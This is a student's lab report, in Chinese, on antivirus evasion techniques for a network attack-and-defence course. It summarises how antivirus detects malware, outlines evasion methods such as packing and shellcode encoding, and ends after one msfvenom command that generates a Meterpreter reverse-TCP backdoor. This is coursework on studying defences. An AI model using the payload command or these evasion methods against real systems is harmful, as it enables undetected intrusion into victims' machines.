20169205 2016-2017-2 《网络攻防技术》 免杀技术
20169205 2016-2017-2 《网络攻防技术》 免杀技术 一、基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 恶意代码常常具有明显的特征码也就是一段数据,杀软检测到具有该特征码的程序就当作检测到了恶意代码。 启发式恶意软件检测 基于行为的恶意软件检测 如果一个程序的行为是带有恶意的行为,那么这个程序也会被认为是恶意代码。 (2)免杀是做什么? 使用一些方法使得恶意程序不被杀软和防火墙发现,避免被查杀。 (3)免杀的基本方法有哪些? 改变特征码 对恶意代码进行加壳、用其他语言或编译器进行再编译,利用shellcode进行编码 改变攻击行为 基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码 实践总结与体会 此次实验使我深入了解了杀毒软件查杀的原理,以及恶意代码的伪装手段。发现即使安装了杀毒软件以及防火墙,还是不能完全的保证电脑是安全的。因此,了解相关恶意程序的原理和伪装手段对提高网络安全意识和增强病毒防护能力由很大的帮助。 离实战还缺些什么技术或步骤? 实际环境中,我们很难将后门程序移植进靶机中,这就需要把这个后门程序伪装后绑定到一些正规的程序中来让后门程序进入靶机。另外我们需要对靶机的状态进行跟踪。 实践过程记录 1.使用msf编码器直接生成一个后门程序 msfvenom -p windows/meterpreter/reverse_tcp